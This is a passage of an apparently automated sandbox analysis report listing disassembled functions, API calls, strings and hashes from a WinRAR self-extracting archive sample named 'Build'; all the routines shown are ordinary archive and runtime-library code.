
FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B53340
FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B53352
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B53363
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53373
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53383
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B533BE
__aullrem.LIBCMT ref: 00B53464

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: a6c306b2f9fbd0346766bb8beec634883e18edc764a56596e803124427bb5abd
Instruction ID: 5be34ece0bf6ee46cd8f8dd49ec38126220a8ecf57272d0b920688bf468028e3
Opcode Fuzzy Hash: a6c306b2f9fbd0346766bb8beec634883e18edc764a56596e803124427bb5abd
Instruction Fuzzy Hash: 9D5138B15083059FC710DF65C88496BB7E9FF88755F40892EF99AD3210EB34E948CB52

Function 00B5BC7E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B5BC8A

Strings

</p>, xrefs: 00B5BD68
>, xrefs: 00B5BCCB
</style>, xrefs: 00B5BDD2
<br>, xrefs: 00B5BD7E
<style>, xrefs: 00B5BDB0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 436b912368728112b3605acf7119a8416916a4a6d07f65ed8cfed3ca0fe8b5a4
Instruction ID: d6b6485d05aa8fac836f5a17022cfed80c6423d688d80c09c957afbc88196564
Opcode Fuzzy Hash: 436b912368728112b3605acf7119a8416916a4a6d07f65ed8cfed3ca0fe8b5a4
Instruction Fuzzy Hash: E751186764035766DB346F199812F7663F0DFA0792F6808FAFDC09B1C0FBA58C898261

Function 00B71CDD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B72452,00000000,00000000,00000000,00000000,00000000,00B67A3D), ref: 00B71D1F
__fassign.LIBCMT ref: 00B71D9A
__fassign.LIBCMT ref: 00B71DB5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B71DDB
WriteFile.KERNEL32(?,00000000,00000000,00B72452,00000000,?,?,?,?,?,?,?,?,?,00B72452,00000000), ref: 00B71DFA
WriteFile.KERNEL32(?,00000000,00000001,00B72452,00000000,?,?,?,?,?,?,?,?,?,00B72452,00000000), ref: 00B71E33

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 82a759d21a593a8bdf8fd3359f96fe18183b18bb66e7b11d7ed2aa6453c93d64
Instruction ID: c27632fb8c8c5e8ad6a8995026534255bec505f92a7dde87d370656e09f05859
Opcode Fuzzy Hash: 82a759d21a593a8bdf8fd3359f96fe18183b18bb66e7b11d7ed2aa6453c93d64
Instruction Fuzzy Hash: 9C516371A002459FDB14CFACD885AEEBBF8FF09300F14895AE969E7251D7309941CB70

Function 00B4ACE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B4AD2B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B4AD4A

Part of subcall function 00B4E208: _wcslen.LIBCMT ref: 00B4E210

Part of subcall function 00B54168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B4E084,00000000,.exe,?,?,00000800,?,?,?,00B5AD5D), ref: 00B5417E

_swprintf.LIBCMT ref: 00B4ADEC

Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13

MoveFileW.KERNEL32(?,?), ref: 00B4AE5E
MoveFileW.KERNEL32(?,?), ref: 00B4AE9E

Strings

rtmp%d, xrefs: 00B4ADD5

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 2133196417-3303766350
Opcode ID: 2e6a79ed255b6e77f6eccb3b04558cf0ac2138a87f71d4a748c6df0478f52cd8
Instruction ID: c051fe1dc485d35e1d1e7fa3e30050e1562f8b8d0d00312c09906e2eb8a8d22f
Opcode Fuzzy Hash: 2e6a79ed255b6e77f6eccb3b04558cf0ac2138a87f71d4a748c6df0478f52cd8
Instruction Fuzzy Hash: 0C5150719406586ACB20EB608C85EEF77FCEF04341F1408E9B566E3141EB34DB84AF61

Function 00B5BE55 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00B5BE8A
GetWindowRect.USER32(?,?), ref: 00B5BED1
ShowWindow.USER32(?,00000005,00000000), ref: 00B5BF6C
SetWindowTextW.USER32(?,00000000), ref: 00B5BF74
ShowWindow.USER32(00000000,00000005), ref: 00B5BF8A

Strings

RarHtmlClassName, xrefs: 00B5BF31

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: b3fd07413f3cbc037c798eede0f0e89ebc1c63fbd5ae8e596a8250da8f43320d
Instruction ID: 0f760a94a5bffdeb50d84a5d2ccd995e704e0b97d3408005014b5061f5e61daa
Opcode Fuzzy Hash: b3fd07413f3cbc037c798eede0f0e89ebc1c63fbd5ae8e596a8250da8f43320d
Instruction Fuzzy Hash: 29414A72548300AFCB119F649C4AFAB7BE8EB49712F154599FD49AB162DF30D808CBA1

Function 00B5B8D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B5B8DE
_wcslen.LIBCMT ref: 00B5B913

Strings

 , xrefs: 00B5B9A1
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00B5B907
, xrefs: 00B5B930
<br>, xrefs: 00B5B95F

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 7e583d57ad9b88179799b11601cfb4b86cfb9899ba427a82618ca65932c32e4f
Instruction ID: fc52ba657806858a68283109fbe95c64591a937c3fe05bbefa233248ad138f9f
Opcode Fuzzy Hash: 7e583d57ad9b88179799b11601cfb4b86cfb9899ba427a82618ca65932c32e4f
Instruction Fuzzy Hash: 4C317D2264830566D634AB549C42F77B3E4FB90321F6045EEFF95972C0FF55AC4983A1

Function 00B6EEF4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B6EEB8: _free.LIBCMT ref: 00B6EEE1

_free.LIBCMT ref: 00B6EF42

Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22

_free.LIBCMT ref: 00B6EF4D
_free.LIBCMT ref: 00B6EF58
_free.LIBCMT ref: 00B6EFAC
_free.LIBCMT ref: 00B6EFB7
_free.LIBCMT ref: 00B6EFC2
_free.LIBCMT ref: 00B6EFCD

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction ID: 1910de26240b2874f289d16f222f4ad0bf0e5644384f3e1c6062e0a13f5edfee
Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction Fuzzy Hash: BB112972940B05AAE660FBF1CD06FCB77EDAF00700F404C55F2AEA6292DB7AE5458B50

Function 00B60ACB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B60B46,00B60AA9,00B60D4A), ref: 00B60AE2
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B60AF8
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B60B0D

Strings

KERNEL32.DLL, xrefs: 00B60ADD
ReleaseSRWLockExclusive, xrefs: 00B60B02
AcquireSRWLockExclusive, xrefs: 00B60AF2

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 250785164882b3ccbd139a3e6d5637bfc8eb267d9153c496b24359c64ca9f102
Instruction ID: 5895872ec64e7630e139f4173e11f8bff156f2a35f5b567a6b577d523dcc6446
Opcode Fuzzy Hash: 250785164882b3ccbd139a3e6d5637bfc8eb267d9153c496b24359c64ca9f102
Instruction Fuzzy Hash: 58F0C2317B1B239B0B35BFA64CCA96B22CCEA1235933888FAD559D3150EE58CC81D3D1

Function 00B5418A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B54192
_wcslen.LIBCMT ref: 00B541A3
_wcslen.LIBCMT ref: 00B541B3
_wcslen.LIBCMT ref: 00B541C1
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B4D2D3,?,?,00000000,?,?,?), ref: 00B541DC

Strings

<, xrefs: 00B541DC

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen$CompareString
String ID: <
API String ID: 3397213944-4251816714
Opcode ID: 98129c741b2f26171c848e796230bdc2b40bb4475ace2eb006cf3190e65e7b34
Instruction ID: 9aefa6771a72ec320bb934654936f94c344167efc2407477d7d5846cea9eea1e
Opcode Fuzzy Hash: 98129c741b2f26171c848e796230bdc2b40bb4475ace2eb006cf3190e65e7b34
Instruction Fuzzy Hash: 0EF03032048154BFCF121F52EC09ECE3F66EF50771B118095FA196A161CF72999597D0

Function 00B53583 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B535E6

Part of subcall function 00B4D076: GetVersionExW.KERNEL32(?), ref: 00B4D0A7

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B5360A
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B53624
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B53637
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53647
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53657

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 3d3545c2d617936d041c041ada0c6ad26491a8d19093a7438f6eaa1b9d102015
Instruction ID: 511f0f6cd2cd17b68f03021eb6b3c57b40d4b8d6995dbe94062c41e2adaea1cb
Opcode Fuzzy Hash: 3d3545c2d617936d041c041ada0c6ad26491a8d19093a7438f6eaa1b9d102015
Instruction Fuzzy Hash: 3641367A1083059BCB04DFA8C88599BB7E8FF98704F44591EF989C7310EB30D949CBA6

Function 00B6511A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B65111,00B64ECC,00B621B4), ref: 00B65128
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B65136
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B6514F
SetLastError.KERNEL32(00000000,00B65111,00B64ECC,00B621B4), ref: 00B651A1

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b6fa9ca20353c94252ca725880826e0024d6a0d7531ed09b72114014f23a2be5
Instruction ID: 57fa10b4ca1bcdf5718696a9bfbbc11bc56dc7a2a4a28a18332281f36d9348f1
Opcode Fuzzy Hash: b6fa9ca20353c94252ca725880826e0024d6a0d7531ed09b72114014f23a2be5
Instruction Fuzzy Hash: 9401F736509B116EA73527B9BC867662BD8FB02374F6013A9F510A61F0EF694C60D244

Function 00B6B9A5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00B850C4,00B66E12,00B850C4,?,?,00B6688D,?,?,00B850C4), ref: 00B6B9A9
_free.LIBCMT ref: 00B6B9DC
_free.LIBCMT ref: 00B6BA04
SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA11
SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA1D
_abort.LIBCMT ref: 00B6BA23

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 0c4d15e8c49251e598e8423f1a66f2a7227120612ba2201dcb075ed6ec13b42d
Instruction ID: fb22ce404a9407bccf461f9e288a3581ef4c03afb1a090cb178839742f2fe67c
Opcode Fuzzy Hash: 0c4d15e8c49251e598e8423f1a66f2a7227120612ba2201dcb075ed6ec13b42d
Instruction Fuzzy Hash: ADF0C836604A0167C61673756C5AF6B26FEDFC1734F2401A4F619E32D2EF2D8C814151

Function 00B6004D Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B60059
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B60073
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B60084
TranslateMessage.USER32(?), ref: 00B6008E
DispatchMessageW.USER32(?), ref: 00B60098
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B600A3

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 421472ada18d2c572bcded4931b810162953ce8af31772fe817eb3c48b95cb64
Instruction ID: a60f3a51acdd5dd2940828143fe7373bbd9e192a2bdbb1fdeedb253a702ab5d7
Opcode Fuzzy Hash: 421472ada18d2c572bcded4931b810162953ce8af31772fe817eb3c48b95cb64
Instruction Fuzzy Hash: AEF0FF72A4522DBBCB306BA5DC4DEDF7F6DEF42751B008021F50AD2050EA78D585C7A0

Function 00B5D41C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000001), ref: 00B5D57B
GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 00B5D591
SetDlgItemTextW.USER32(?,00000067,?), ref: 00B5D5B9

Strings

Software\WinRAR SFX, xrefs: 00B5D466
GETPASSWORD1, xrefs: 00B5D548

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 1770891597-1315819833
Opcode ID: 565c09a60d7ad7effd1b96ed46733e797fb56ce03c7c04b80838594bb45f61b3
Instruction ID: f69767bc271a4151471046863bdb851f9fe340b943446fe770b0c5324b62fb67
Opcode Fuzzy Hash: 565c09a60d7ad7effd1b96ed46733e797fb56ce03c7c04b80838594bb45f61b3
Instruction Fuzzy Hash: 4E41B7719442086BEB30AF64DC45FFE77ECEB59301F1049B9FA05E3191DB70A9488B65

Function 00B4E033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00B52663: _wcslen.LIBCMT ref: 00B52669

Part of subcall function 00B4D848: _wcsrchr.LIBVCRUNTIME ref: 00B4D85F

_wcslen.LIBCMT ref: 00B4E105
_wcslen.LIBCMT ref: 00B4E14D

Strings

.sfx, xrefs: 00B4E088
.rar, xrefs: 00B4E04F, 00B4E0A2
.exe, xrefs: 00B4E079

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

